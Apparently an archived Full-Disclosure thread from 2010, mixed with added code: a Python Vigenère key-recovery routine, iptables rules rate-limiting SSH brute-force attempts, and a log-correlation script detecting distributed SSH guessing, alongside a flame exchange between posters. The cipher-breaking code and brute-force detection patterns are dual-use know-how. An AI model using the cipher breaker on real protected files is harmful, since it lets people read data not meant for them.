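def guess_key_length(ct, max_len=16):
    """English has IoC ~0.066, flattened text ~0.038. At the true period every
    column is single-shift English, so take the first length whose columns look English."""
    for L in range(1, max_len + 1):
        if sum(index_of_coincidence(ct[i::L]) for i in range(L)) / L > 0.06:
            return L
    return 1

def solve_column(col):
    """Caesar shift whose decryption is closest to English by chi-squared."""
    n = len(col)
    best = min(range(26), key=lambda s: sum(
        (sum(1 for c in col if (A.index(c) - s) % 26 == i) - ENG[i] * n / 100) ** 2
        / (ENG[i] * n / 100) for i in range(26)))
    return A[best]

def break_vigenere(ct, max_len=16):
    """Recover the key from ciphertext alone: period first, then one letter per column."""
    L = guess_key_length(ct, max_len)
    return "".join(solve_column(ct[i::L]) for i in range(L))

# Constructed sample: a public-domain English paragraph and a short key.
SAMPLE = ("It was the best of times, it was the worst of times, it was the age of wisdom, "
          "it was the age of foolishness, it was the epoch of belief, it was the epoch of "
          "incredulity, it was the season of Light, it was the season of Darkness, it was "
          "the spring of hope, it was the winter of despair, we had everything before us, "
          "we had nothing before us, we were all going direct to Heaven, we were all going "
          "direct the other way, in short, the period was so far like the present period, "
          "that some of its noisiest authorities insisted on its being received, for good "
          "or for evil, in the superlative degree of comparison only.")
KEY = "TGP"

if __name__ == "__main__":
    ct = vigenere(SAMPLE, KEY)
    print(break_vigenere(ct))  # prints the recovered key
```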



Re: [Full-disclosure] Introducing TGP...

2010-06-17 Thread Thor (Hammer Of God)
At first, your posts were entertaining. Now, it is evident that all  
you do is make arguments for the sake of attention without ever  
providing original thought or substantive content. In short, you are a  
Google bot and a troll.

I apologize to the list for feeding you. It won't happen again.

T



On Jun 17, 2010, at 7:26 PM, lsi  wrote:

> http://en.wikipedia.org/wiki/Vigenere_cipher
>
> "This cipher is well known because while it is easy to understand and
> implement, it often appears to beginners to be unbreakable; this
> earned it the description le chiffre indéchiffrable (French for 'the
> unbreakable cipher'). Consequently, many people have tried to
> implement encryption schemes that are essentially Vigenère ciphers,
> only to have them broken[1]."
>
> 1. Smith, Laurence D. (1943). "Substitution Ciphers". Cryptography
> the Science of Secret Writing: The Science of Secret Writing. Dover
> Publications. pp. 81. ISBN 0-486-20247-X.
>
> Stu
>
> On 18 Jun 2010 at 2:00, Pavel Kankovsky wrote:
>
> Date sent:  Fri, 18 Jun 2010 02:00:48 +0200 (CEST)
> From:   Pavel Kankovsky 
> To: full-disclosure@lists.grok.org.uk
> Subject:Re: [Full-disclosure] Introducing TGP...
>
>> On Mon, 14 Jun 2010, lsi wrote:
>>
>>> [...] cracking some files protected by ancient crypto.
>>
>> Ancient crypto? Five or so years ago I met a "big business"  
>> application
>> using an encryption algorithm based on the Vigenere cipher (you know,
>> that 450 year old thing *not* invented by Blaise de Vigenere). :)
>>
>> -- 
>> Pavel Kankovsky aka Peak  / Jeremiah  
>> 9:21\
>> "For death is come up into our MS Windows(tm)..." \ 21st century  
>> edition /
>>
>>
>
>
>
> ---
> Stuart Udall
> stuart a...@cyberdelix.dot net - http://www.cyberdelix.net/
>
> ---
> * Origin: lsi: revolution through evolution (192:168/0.2)
>


Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread BMF
On Thu, Jun 17, 2010 at 5:31 PM, Sebastian Rother
 wrote:
>  But OpenBSDs "PF" could limit the
> attacks you descripe pretty nicely (and here I have to thanks Henning
> and others for their free time imho, what you made is imho working at
> least).

Here's how it is done on Linux:

iptables -F
iptables -t nat -F
iptables -t mangle -F
iptables -X

# Block SSH brute force attacks but not our networks like 1.2.3.0/24 etc.
iptables -N SSH_WHITELIST
iptables -A SSH_WHITELIST -s 1.2.3.0/24 -m recent --remove --name SSH -j ACCEPT
iptables -A SSH_WHITELIST -s 4.5.6.0/24 -m recent --remove --name SSH -j ACCEPT

# Record every new SSH connection in the "SSH" recent list, let whitelisted
# sources through (and forget them), then log and drop any source that has
# opened 4 or more new connections within the last 60 seconds.
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j SSH_WHITELIST
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j LOG
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j DROP

BMF
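
An added example, not from BMF's or Pavel Kankovsky's posts: the rule above counts hits per source per host, so the pattern Pavel describes upthread (each IP makes a handful of attempts against each of ~15 servers, then a new IP takes over) never reaches hitcount 4 anywhere. Correlating the failed-login lines of several servers does catch it; the per-host and cross-host views are shown side by side. Host names, addresses and log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) sshd\[\d+\]: "
                    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def parse(lines, year=2010):
    """Return (time, host, user, source_ip) for every failed-password line."""
    events = []
    for line in lines:
        if m := LOG_RE.match(line):
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            events.append((ts, m.group(2), m.group(3), m.group(4)))
    return events

def per_host_offenders(events, hits=4, seconds=60):
    """The view a per-host rule has (like the iptables recent match above):
    flag an IP only when it makes >= hits attempts at one host within seconds."""
    by_pair = defaultdict(list)
    for ts, host, _, ip in events:
        by_pair[(host, ip)].append(ts)
    bad = set()
    for (host, ip), times in by_pair.items():
        times.sort()
        for i in range(len(times) - hits + 1):
            if (times[i + hits - 1] - times[i]).total_seconds() <= seconds:
                bad.add(ip)
    return bad

def distributed_offenders(events, min_hosts=3, seconds=300):
    """Cross-host view: flag an IP that fails at >= min_hosts distinct servers
    within seconds, however few attempts it makes at each one."""
    by_ip = defaultdict(list)
    for ts, host, _, ip in events:
        by_ip[ip].append((ts, host))
    bad = set()
    for ip, visits in by_ip.items():
        visits.sort()
        for i, (t0, _) in enumerate(visits):
            hosts = {h for t, h in visits[i:] if (t - t0).total_seconds() <= seconds}
            if len(hosts) >= min_hosts:
                bad.add(ip); break
    return bad

# Constructed sample: auth.log lines merged from three servers (srv1..srv3);
# all addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
Jun 17 10:00:01 srv1 sshd[1201]: Failed password for root from 198.51.100.7 port 40211 ssh2
Jun 17 10:00:03 srv1 sshd[1201]: Failed password for root from 198.51.100.7 port 40211 ssh2
Jun 17 10:00:09 srv2 sshd[3310]: Failed password for invalid user admin from 198.51.100.7 port 40512 ssh2
Jun 17 10:00:20 srv3 sshd[2222]: Failed password for root from 198.51.100.7 port 40900 ssh2
Jun 17 10:01:05 srv1 sshd[1210]: Failed password for root from 198.51.100.8 port 50111 ssh2
Jun 17 10:01:14 srv2 sshd[3320]: Failed password for root from 198.51.100.8 port 50300 ssh2
Jun 17 10:01:22 srv3 sshd[2230]: Failed password for invalid user test from 198.51.100.8 port 50420 ssh2
Jun 17 10:02:00 srv1 sshd[1220]: Failed password for alice from 192.0.2.10 port 51000 ssh2
Jun 17 10:03:00 srv1 sshd[1230]: Failed password for root from 203.0.113.5 port 60001 ssh2
Jun 17 10:03:02 srv1 sshd[1231]: Failed password for root from 203.0.113.5 port 60002 ssh2
Jun 17 10:03:04 srv1 sshd[1232]: Failed password for root from 203.0.113.5 port 60003 ssh2
Jun 17 10:03:06 srv1 sshd[1233]: Failed password for root from 203.0.113.5 port 60004 ssh2
""".splitlines()
```

Only 203.0.113.5 trips the per-host threshold; the two sources spreading one or two attempts over each server are visible only in the cross-host view, and the single mistyped login from 192.0.2.10 is flagged by neither.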



Re: [Full-disclosure] Introducing TGP...

2010-06-17 Thread lsi
Dear Tim,

Go away!  I don't care whether you don't care, or not.  If you don't 
like my mails, don't reply to them.

Stu

On 17 Jun 2010 at 20:39, Thor (Hammer Of God) wrote:

From:   "Thor (Hammer Of God)" 
To: "" 
Subject:Re: [Full-disclosure] Introducing TGP...
Date sent:  Thu, 17 Jun 2010 20:39:34 -0700
Copies to:  "" 

> At first, your posts were entertaining. Now, it is evident that all  
> you do is make arguments for the sake of attention without ever  
> providing original thought or substantive content. In short, you are a  
> Google bot and a troll.
> 
> I apologize to the list for feeding you. It won't happen again.
> 
> T
> 
> 
> 
> On Jun 17, 2010, at 7:26 PM, lsi  wrote:
> 
> > http://en.wikipedia.org/wiki/Vigenere_cipher
> >
> > "This cipher is well known because while it is easy to understand and
> > implement, it often appears to beginners to be unbreakable; this
> > earned it the description le chiffre indéchiffrable (French for 'the
> > unbreakable cipher'). Consequently, many people have tried to
> > implement encryption schemes that are essentially Vigenère ciphers,
> > only to have them broken[1]."
> >
> > 1. Smith, Laurence D. (1943). "Substitution Ciphers". Cryptography
> > the Science of Secret Writing: The Science of Secret Writing. Dover
> > Publications. pp. 81. ISBN 0-486-20247-X.
> >
> > Stu
> >
> > On 18 Jun 2010 at 2:00, Pavel Kankovsky wrote:
> >
> > Date sent:  Fri, 18 Jun 2010 02:00:48 +0200 (CEST)
> > From:   Pavel Kankovsky 
> > To: full-disclosure@lists.grok.org.uk
> > Subject:Re: [Full-disclosure] Introducing TGP...
> >
> >> On Mon, 14 Jun 2010, lsi wrote:
> >>
> >>> [...] cracking some files protected by ancient crypto.
> >>
> >> Ancient crypto? Five or so years ago I met a "big business"  
> >> application
> >> using an encryption algorithm based on the Vigenere cipher (you know,
> >> that 450 year old thing *not* invented by Blaise de Vigenere). :)
> >>
> >> -- 
> >> Pavel Kankovsky aka Peak  / Jeremiah  
> >> 9:21\
> >> "For death is come up into our MS Windows(tm)..." \ 21st century  
> >> edition /
> >>
> >>
> >
> >
> >
> > ---
> > Stuart Udall
> > stuart a...@cyberdelix.dot net - http://www.cyberdelix.net/
> >
> > ---
> > * Origin: lsi: revolution through evolution (192:168/0.2)
> >
> 



---
Stuart Udall
stuart a...@cyberdelix.dot net - http://www.cyberdelix.net/

--- 
 * Origin: lsi: revolution through evolution (192:168/0.2)
